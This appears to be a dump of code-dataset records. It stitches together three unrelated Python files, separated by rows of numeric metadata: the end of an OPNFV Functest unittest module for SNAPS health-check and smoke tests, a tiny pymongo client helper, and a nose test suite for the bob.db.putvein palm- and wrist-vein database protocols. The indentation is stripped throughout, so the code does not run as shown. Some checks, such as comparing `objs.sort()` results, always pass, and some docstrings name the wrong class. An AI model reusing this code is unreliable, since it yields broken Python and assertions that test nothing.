@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_client_tests')
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_api_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko_criteria(self, *args):
self.api_check.criteria = 90
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.api_check.run())
self.assertEquals(
testcase.TestCase.EX_OK, self.api_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', image_metadata=mock.ANY,
os_creds=self.os_creds, suite=mock.ANY, use_keystone=True)
class HealthCheckTesting(unittest.TestCase):
"""
Ensures the VPingUserdata class can run in Functest. This test does not
actually connect with an OpenStack pod.
"""
def setUp(self):
self.os_creds = OSCreds(
username='user', password='pass',
auth_url='http://foo.com:5000/v3', project_name='bar')
self.health_check = health_check.HealthCheck(
os_creds=self.os_creds, ext_net_name='foo')
@mock.patch('snaps.openstack.tests.os_source_file_test.'
'OSIntegrationTestCase.parameterize')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_success(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = []
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.health_check.run())
self.assertEquals(
testcase.TestCase.EX_OK, self.health_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
mock.ANY, ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=None,
os_creds=self.os_creds, use_keystone=True)
@mock.patch('snaps.openstack.tests.os_source_file_test.'
'OSIntegrationTestCase.parameterize')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.health_check.run())
self.assertEquals(
testcase.TestCase.EX_TESTCASE_FAILED,
self.health_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
mock.ANY, ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=None,
os_creds=self.os_creds, use_keystone=True)
@mock.patch('snaps.openstack.tests.os_source_file_test.'
'OSIntegrationTestCase.parameterize')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko_criteria(self, *args):
self.health_check.criteria = 90
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.health_check.run())
self.assertEquals(
testcase.TestCase.EX_OK, self.health_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
mock.ANY, ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=None,
os_creds=self.os_creds, use_keystone=True)
class SmokeTesting(unittest.TestCase):
"""
Ensures the VPingUserdata class can run in Functest. This test does not
actually connect with an OpenStack pod.
"""
def setUp(self):
self.os_creds = OSCreds(
username='user', password='pass',
auth_url='http://foo.com:5000/v3', project_name='bar')
self.smoke = smoke.SnapsSmoke(
os_creds=self.os_creds, ext_net_name='foo')
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_integration_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_success(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = []
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.smoke.run())
self.assertEquals(testcase.TestCase.EX_OK, self.smoke.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=None,
os_creds=self.os_creds, suite=mock.ANY, use_floating_ips=True,
use_keystone=True)
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_integration_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.smoke.run())
self.assertEquals(
testcase.TestCase.EX_TESTCASE_FAILED, self.smoke.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=mock.ANY,
os_creds=self.os_creds, suite=mock.ANY, use_floating_ips=True,
use_keystone=True)
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_integration_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko_criteria(self, *args):
self.smoke.criteria = 90
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.smoke.run())
self.assertEquals(
testcase.TestCase.EX_OK, self.smoke.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=None,
os_creds=self.os_creds, suite=mock.ANY, use_floating_ips=True,
use_keystone=True)
if __name__ == "__main__":
logging.disable(logging.CRITICAL)
unittest.main(verbosity=2)
| 43.944444 | 78 | 0.675095 | 1,301 | 10,283 | 5.083013 | 0.113759 | 0.059882 | 0.044912 | 0.065326 | 0.907606 | 0.907606 | 0.907606 | 0.901255 | 0.887041 | 0.884924 | 0 | 0.015491 | 0.208986 | 10,283 | 233 | 79 | 44.133047 | 0.797517 | 0.065351 | 0 | 0.860215 | 0 | 0 | 0.166771 | 0.149906 | 0 | 0 | 0 | 0 | 0.193548 | 1 | 0.064516 | false | 0.016129 | 0.043011 | 0 | 0.123656 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a3a3aebdb9f9d04511e387f692e6fc6e4f58995f | 96 | py | Python | app/mongo/client.py | jgphilpott/polyMaker | 33ab5ecdba277d1765ffdaebb77f0bab2480dc46 | [
"MIT"
] | null | null | null | app/mongo/client.py | jgphilpott/polyMaker | 33ab5ecdba277d1765ffdaebb77f0bab2480dc46 | [
"MIT"
] | null | null | null | app/mongo/client.py | jgphilpott/polyMaker | 33ab5ecdba277d1765ffdaebb77f0bab2480dc46 | [
"MIT"
] | null | null | null | from pymongo import MongoClient
def mongo_client():
return MongoClient("database", 27017)
| 16 | 41 | 0.760417 | 11 | 96 | 6.545455 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061728 | 0.15625 | 96 | 5 | 42 | 19.2 | 0.82716 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
6e66bb48f352342e89dbdeeb2f35ff0a40c61711 | 22,277 | py | Python | bob/db/putvein/test.py | bioidiap/bob.db.putvein | e5b0ec0bafd6b38d7d2a52f4df9a4612966ab707 | [
"BSD-3-Clause"
] | null | null | null | bob/db/putvein/test.py | bioidiap/bob.db.putvein | e5b0ec0bafd6b38d7d2a52f4df9a4612966ab707 | [
"BSD-3-Clause"
] | null | null | null | bob/db/putvein/test.py | bioidiap/bob.db.putvein | e5b0ec0bafd6b38d7d2a52f4df9a4612966ab707 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# vim: set fileencoding=utf-8 :
import nose.tools
from .query import Database
def _query_simple_protocol_tests(protocol):
db = Database()
objs = db.objects(protocol)
nose.tools.eq_(len(objs), 1800) # number of images in the protocol
objs = db.objects(protocol, kinds='palm')
nose.tools.eq_(len(objs), 900) # number of palm images in the protocol
objs = db.objects(protocol, kinds='wrist')
nose.tools.eq_(len(objs), 900) # number of wrist images in the protocol
objs = db.objects(protocol, groups='train')
nose.tools.eq_(len(objs), 600) # number of train images in the protocol
objs = db.objects(protocol, groups='dev')
nose.tools.eq_(len(objs), 600) # number of dev images in the protocol
objs = db.objects(protocol, groups='eval')
nose.tools.eq_(len(objs), 600) # number of dev eval in the protocol
objs = db.objects(protocol, kinds='palm', groups='train')
nose.tools.eq_(len(objs), 300) # number of palm train images in the protocol
objs = db.objects(protocol, kinds='palm', groups='dev')
nose.tools.eq_(len(objs), 300) # number of palm dev images in the protocol
objs = db.objects(protocol, kinds='palm', groups='eval')
nose.tools.eq_(len(objs), 300) # number of palm dev eval in the protocol
objs = db.objects(protocol, kinds='wrist', groups='train')
nose.tools.eq_(len(objs), 300) # number of wrist train images in the protocol
objs = db.objects(protocol, kinds='wrist', groups='dev')
nose.tools.eq_(len(objs), 300) # number of wrist dev images in the protocol
objs = db.objects(protocol, kinds='wrist', groups='eval')
nose.tools.eq_(len(objs), 300) # number of wrist dev eval in the protocol
objs = db.objects(protocol, kinds='palm', groups='dev', purposes='enroll')
nose.tools.eq_(len(objs), 100) # number of palm dev enroll images in the protocol
objs = db.objects(protocol, kinds='palm', groups='dev', purposes='probe')
nose.tools.eq_(len(objs), 200) # number of palm dev probe images in the protocol
objs = db.objects(protocol, kinds='palm', groups='eval', purposes='enroll')
nose.tools.eq_(len(objs), 100) # number of palm dev enroll eval in the protocol
objs = db.objects(protocol, kinds='palm', groups='eval', purposes='probe')
nose.tools.eq_(len(objs), 200) # number of palm dev probe eval in the protocol
objs = db.objects(protocol, kinds='wrist', groups='dev', purposes='enroll')
nose.tools.eq_(len(objs), 100) # number of wrist dev enroll images in the protocol
objs = db.objects(protocol, kinds='wrist', groups='dev', purposes='probe')
nose.tools.eq_(len(objs), 200) # number of wrist dev probe images in the protocol
objs = db.objects(protocol, kinds='wrist', groups='eval', purposes='enroll')
nose.tools.eq_(len(objs), 100) # number of wrist eval enroll in the protocol
objs = db.objects(protocol, kinds='wrist', groups='eval', purposes='probe')
nose.tools.eq_(len(objs), 200) # number of wrist eval probe in the protocol
objs = db.objects(protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["26"])
objs_probe = db.objects(protocol, kinds='wrist', groups='eval', purposes='probe')
# when quering for probes specifying exact MODEL ID, all probe files should
# be returned:
nose.tools.eq_(len(objs), len(objs_probe))
if protocol.startswith('L'):
nose.tools.eq_(objs[0].make_path(), 'Wrist/o_026/Left/Series_2/W_o026_L_S2_Nr1.bmp')
else:
nose.tools.eq_(objs[0].make_path(), 'Wrist/o_026/Right/Series_2/W_o026_R_S2_Nr1.bmp')
def _query_combined_protocol_tests(protocol):
db = Database()
objs = db.objects(protocol)
nose.tools.eq_(len(objs), 7200) # number of images in the protocol
objs = db.objects(protocol, kinds='palm')
nose.tools.eq_(len(objs), 3600) # number of palm images in the protocol
objs = db.objects(protocol, kinds='wrist')
nose.tools.eq_(len(objs), 3600) # number of wrist images in the protocol
objs = db.objects(protocol, groups='train')
nose.tools.eq_(len(objs), 1200) # number of train images in the protocol
objs = db.objects(protocol, groups='dev')
nose.tools.eq_(len(objs), 1200) # number of dev images in the protocol
objs = db.objects(protocol, groups='eval')
nose.tools.eq_(len(objs), 1200) # number of dev eval in the protocol
objs = db.objects(protocol, kinds='palm', groups='train')
nose.tools.eq_(len(objs), 600) # number of palm train images in the protocol
objs = db.objects(protocol, kinds='palm', groups='dev')
nose.tools.eq_(len(objs), 600) # number of palm dev images in the protocol
objs = db.objects(protocol, kinds='palm', groups='eval')
nose.tools.eq_(len(objs), 600) # number of palm dev eval in the protocol
objs = db.objects(protocol, kinds='wrist', groups='train')
nose.tools.eq_(len(objs), 600) # number of wrist train images in the protocol
objs = db.objects(protocol, kinds='wrist', groups='dev')
nose.tools.eq_(len(objs), 600) # number of wrist dev images in the protocol
objs = db.objects(protocol, kinds='wrist', groups='eval')
nose.tools.eq_(len(objs), 600) # number of wrist dev eval in the protocol
objs = db.objects(protocol, kinds='palm', groups='dev', purposes='enroll')
nose.tools.eq_(len(objs), 200) # number of palm dev enroll images in the protocol
objs = db.objects(protocol, kinds='palm', groups='dev', purposes='probe')
nose.tools.eq_(len(objs), 400) # number of palm dev probe images in the protocol
objs = db.objects(protocol, kinds='palm', groups='eval', purposes='enroll')
nose.tools.eq_(len(objs), 200) # number of palm dev enroll eval in the protocol
objs = db.objects(protocol, kinds='palm', groups='eval', purposes='probe')
nose.tools.eq_(len(objs), 400) # number of palm dev probe eval in the protocol
objs = db.objects(protocol, kinds='wrist', groups='dev', purposes='enroll')
nose.tools.eq_(len(objs), 200) # number of wrist dev enroll images in the protocol
objs = db.objects(protocol, kinds='wrist', groups='dev', purposes='probe')
nose.tools.eq_(len(objs), 400) # number of wrist dev probe images in the protocol
objs = db.objects(protocol, kinds='wrist', groups='eval', purposes='enroll')
nose.tools.eq_(len(objs), 200) # number of wrist eval enroll in the protocol
objs = db.objects(protocol, kinds='wrist', groups='eval', purposes='probe')
nose.tools.eq_(len(objs), 400) # number of wrist eval probe in the protocol
def test_query_L_4_protocol():
protocol = 'L_4'
_query_simple_protocol_tests(protocol)
db = Database()
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["1"])
nose.tools.eq_(len(objs), 4)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 1)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["1"])
nose.tools.eq_(len(objs), 25*(4*2))
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["26"])
nose.tools.eq_(len(objs), 4)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 26)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["26"])
nose.tools.eq_(len(objs), 25*(4*2))
def test_query_R_4_protocol():
protocol = 'R_4'
_query_simple_protocol_tests(protocol)
db = Database()
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["1"])
nose.tools.eq_(len(objs), 4)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 1)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["1"])
nose.tools.eq_(len(objs), 25*(4*2))
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["26"])
nose.tools.eq_(len(objs), 4)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 26)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["26"])
nose.tools.eq_(len(objs), 25*(4*2))
def test_query_LR_4_protocol():
protocol = 'LR_4'
_query_combined_protocol_tests(protocol)
db = Database()
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["26"])
nose.tools.eq_(len(objs), 4)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 26)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["26"])
nose.tools.eq_(len(objs), 25*(4*2)*2)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["61"])
nose.tools.eq_(len(objs), 4)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 61)
nose.tools.eq_(obj.is_mirrored(), True)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["61"])
nose.tools.eq_(len(objs), 25*(4*2)*2)
def test_query_RL_4_protocol():
protocol = 'RL_4'
_query_combined_protocol_tests(protocol)
db = Database()
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["26"])
nose.tools.eq_(len(objs), 4)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 26)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["26"])
nose.tools.eq_(len(objs), 25*(4*2)*2)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["61"])
nose.tools.eq_(len(objs), 4)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 61)
nose.tools.eq_(obj.is_mirrored(), True)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["61"])
nose.tools.eq_(len(objs), 25*(4*2)*2)
###############################################################################
def test_query_L_1_protocol():
protocol = 'L_1'
_query_simple_protocol_tests(protocol)
db = Database()
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["1_3"])
nose.tools.eq_(len(objs), 1)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 1)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["1_3"])
nose.tools.eq_(len(objs), 25*(4*2))
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["26_2"])
nose.tools.eq_(len(objs), 1)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 26)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["26_3"])
nose.tools.eq_(len(objs), 25*(4*2))
def test_query_R_1_protocol():
protocol = 'R_1'
_query_simple_protocol_tests(protocol)
db = Database()
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["1_3"])
nose.tools.eq_(len(objs), 1)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 1)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["1_3"])
nose.tools.eq_(len(objs), 25*(4*2))
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["26_2"])
nose.tools.eq_(len(objs), 1)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 26)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["26_3"])
nose.tools.eq_(len(objs), 25*(4*2))
def test_query_LR_1_protocol():
protocol = 'LR_1'
_query_combined_protocol_tests(protocol)
db = Database()
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["26_4"])
nose.tools.eq_(len(objs), 1)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 26)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["26_1"])
nose.tools.eq_(len(objs), 25*(4*2)*2)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["61_1"])
nose.tools.eq_(len(objs), 1)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 61)
nose.tools.eq_(obj.is_mirrored(), True)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["61_2"])
nose.tools.eq_(len(objs), 25*(4*2)*2)
def test_query_RL_1_protocol():
protocol = 'RL_1'
_query_combined_protocol_tests(protocol)
db = Database()
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='enroll', model_ids=["26_2"])
nose.tools.eq_(len(objs), 1)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 26)
nose.tools.eq_(obj.is_mirrored(), False)
objs = db.objects(protocol=protocol, kinds='wrist', groups='dev', purposes='probe', model_ids=["26_1"])
nose.tools.eq_(len(objs), 25*(4*2)*2)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='enroll', model_ids=["61_4"])
nose.tools.eq_(len(objs), 1)
for obj in objs:
nose.tools.eq_(obj.get_client_id(), 61)
nose.tools.eq_(obj.is_mirrored(), True)
objs = db.objects(protocol=protocol, kinds='wrist', groups='eval', purposes='probe', model_ids=["61_4"])
nose.tools.eq_(len(objs), 25*(4*2)*2)
def test_query_R_BEAT_1_protocol():
db = Database()
# dev:
objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="dev", kinds="wrist")
nose.tools.eq_(len(objs), 2*4)
objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="dev", kinds="wrist")
nose.tools.eq_(len(objs), 2*2*4)
objs = db.objects(protocol="R_BEAT_1", purposes=["enroll"], groups="dev", kinds="wrist", model_ids=["1_1"])
nose.tools.eq_(len(objs), 1)
objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="dev", kinds="wrist", model_ids=["1_1"])
nose.tools.eq_(len(objs), 1)
objs = db.objects(protocol="R_BEAT_1", purposes=["probe"], groups="dev", kinds="wrist", model_ids=["1_1"])
nose.tools.eq_(len(objs), 16)
objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="dev", kinds="wrist", model_ids=["1_1"])
nose.tools.eq_(len(objs), 16)
objs = db.model_ids(protocol="R_BEAT_1", groups="dev", kinds="palm")
nose.tools.eq_(len(objs), 8)
# eval:
objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="eval", kinds="wrist")
nose.tools.eq_(len(objs), 2*4)
objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="eval", kinds="wrist")
nose.tools.eq_(len(objs), 2*2*4)
objs = db.objects(protocol="R_BEAT_1", purposes=["enroll"], groups="eval", kinds="wrist", model_ids=["26_4"])
nose.tools.eq_(len(objs), 1)
objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="eval", kinds="wrist", model_ids=["26_4"])
nose.tools.eq_(len(objs), 1)
objs = db.objects(protocol="R_BEAT_1", purposes=["probe"], groups="eval", kinds="wrist", model_ids=["26_4"])
nose.tools.eq_(len(objs), 16)
objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="eval", kinds="wrist", model_ids=["26_4"])
nose.tools.eq_(len(objs), 16)
objs = db.model_ids(protocol="R_BEAT_1", groups="eval", kinds="palm")
nose.tools.eq_(len(objs), 8)
# test the same on PALMS:
# dev:
objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="dev", kinds="palm")
nose.tools.eq_(len(objs), 2*4)
objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="dev", kinds="palm")
nose.tools.eq_(len(objs), 2*2*4)
objs = db.objects(protocol="R_BEAT_1", purposes=["enroll"], groups="dev", kinds="palm", model_ids=["1_1"])
nose.tools.eq_(len(objs), 1)
objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="dev", kinds="palm", model_ids=["1_1"])
nose.tools.eq_(len(objs), 1)
objs = db.objects(protocol="R_BEAT_1", purposes=["probe"], groups="dev", kinds="palm", model_ids=["1_1"])
nose.tools.eq_(len(objs), 16)
objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="dev", kinds="palm", model_ids=["1_1"])
nose.tools.eq_(len(objs), 16)
objs = db.model_ids(protocol="R_BEAT_1", groups="dev", kinds="palm")
nose.tools.eq_(len(objs), 8)
# eval:
objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="eval", kinds="palm")
nose.tools.eq_(len(objs), 2*4)
objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="eval", kinds="palm")
nose.tools.eq_(len(objs), 2*2*4)
objs = db.objects(protocol="R_BEAT_1", purposes=["enroll"], groups="eval", kinds="palm", model_ids=["26_4"])
nose.tools.eq_(len(objs), 1)
objs = db.objects(protocol="R_BEAT_1", purposes="enroll", groups="eval", kinds="palm", model_ids=["26_4"])
nose.tools.eq_(len(objs), 1)
objs = db.objects(protocol="R_BEAT_1", purposes=["probe"], groups="eval", kinds="palm", model_ids=["26_4"])
nose.tools.eq_(len(objs), 16)
objs = db.objects(protocol="R_BEAT_1", purposes="probe", groups="eval", kinds="palm", model_ids=["26_4"])
nose.tools.eq_(len(objs), 16)
objs = db.model_ids(protocol="R_BEAT_1", groups="eval", kinds="palm")
nose.tools.eq_(len(objs), 8)
def test_query_R_BEAT_4_protocol():
db = Database()
# dev:
objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="dev", kinds="wrist")
nose.tools.eq_(len(objs), 2*4)
objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="dev", kinds="wrist")
nose.tools.eq_(len(objs), 2*2*4)
objs = db.objects(protocol="R_BEAT_4", purposes=["enroll"], groups="dev", kinds="wrist", model_ids=["1"])
nose.tools.eq_(len(objs), 4)
objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="dev", kinds="wrist", model_ids=["1"])
nose.tools.eq_(len(objs), 4)
objs = db.objects(protocol="R_BEAT_4", purposes=["probe"], groups="dev", kinds="wrist", model_ids=["1"])
nose.tools.eq_(len(objs), 16)
objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="dev", kinds="wrist", model_ids=["1"])
nose.tools.eq_(len(objs), 16)
objs = db.model_ids(protocol="R_BEAT_4", groups="dev", kinds="palm")
nose.tools.eq_(objs.sort(), ["1", "2"].sort())
# eval:
objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="eval", kinds="wrist")
nose.tools.eq_(len(objs), 2*4)
objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="eval", kinds="wrist")
nose.tools.eq_(len(objs), 2*2*4)
objs = db.objects(protocol="R_BEAT_4", purposes=["enroll"], groups="eval", kinds="wrist", model_ids=["26"])
nose.tools.eq_(len(objs), 4)
objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="eval", kinds="wrist", model_ids=["26"])
nose.tools.eq_(len(objs), 4)
objs = db.objects(protocol="R_BEAT_4", purposes=["probe"], groups="eval", kinds="wrist", model_ids=["26"])
nose.tools.eq_(len(objs), 16)
objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="eval", kinds="wrist", model_ids=["26"])
nose.tools.eq_(len(objs), 16)
objs = db.model_ids(protocol="R_BEAT_4", groups="eval", kinds="palm")
nose.tools.eq_(objs.sort(), ["26", "27"].sort())
# test the same on PALMS:
# dev:
objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="dev", kinds="palm")
nose.tools.eq_(len(objs), 2*4)
objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="dev", kinds="palm")
nose.tools.eq_(len(objs), 2*2*4)
objs = db.objects(protocol="R_BEAT_4", purposes=["enroll"], groups="dev", kinds="palm", model_ids=["1"])
nose.tools.eq_(len(objs), 4)
objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="dev", kinds="palm", model_ids=["1"])
nose.tools.eq_(len(objs), 4)
objs = db.objects(protocol="R_BEAT_4", purposes=["probe"], groups="dev", kinds="palm", model_ids=["1"])
nose.tools.eq_(len(objs), 16)
objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="dev", kinds="palm", model_ids=["1"])
nose.tools.eq_(len(objs), 16)
objs = db.model_ids(protocol="R_BEAT_4", groups="dev", kinds="palm")
nose.tools.eq_(objs.sort(), ["1", "2"].sort())
# eval:
objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="eval", kinds="palm")
nose.tools.eq_(len(objs), 2*4)
objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="eval", kinds="palm")
nose.tools.eq_(len(objs), 2*2*4)
objs = db.objects(protocol="R_BEAT_4", purposes=["enroll"], groups="eval", kinds="palm", model_ids=["26"])
nose.tools.eq_(len(objs), 4)
objs = db.objects(protocol="R_BEAT_4", purposes="enroll", groups="eval", kinds="palm", model_ids=["26"])
nose.tools.eq_(len(objs), 4)
objs = db.objects(protocol="R_BEAT_4", purposes=["probe"], groups="eval", kinds="palm", model_ids=["26"])
nose.tools.eq_(len(objs), 16)
objs = db.objects(protocol="R_BEAT_4", purposes="probe", groups="eval", kinds="palm", model_ids=["26"])
nose.tools.eq_(len(objs), 16)
objs = db.model_ids(protocol="R_BEAT_4", groups="eval", kinds="palm")
nose.tools.eq_(objs.sort(), ["26", "27"].sort())
def test_dumplist():
from bob.db.base.script.dbmanage import main
nose.tools.eq_(main('putvein dumplist --protocol=L_4 --self-test'.split()), 0)
"""
import bob.db.putvein
from bob.db.putvein import Database
db = bob.db.putvein.Database()
import nose.tools
"""
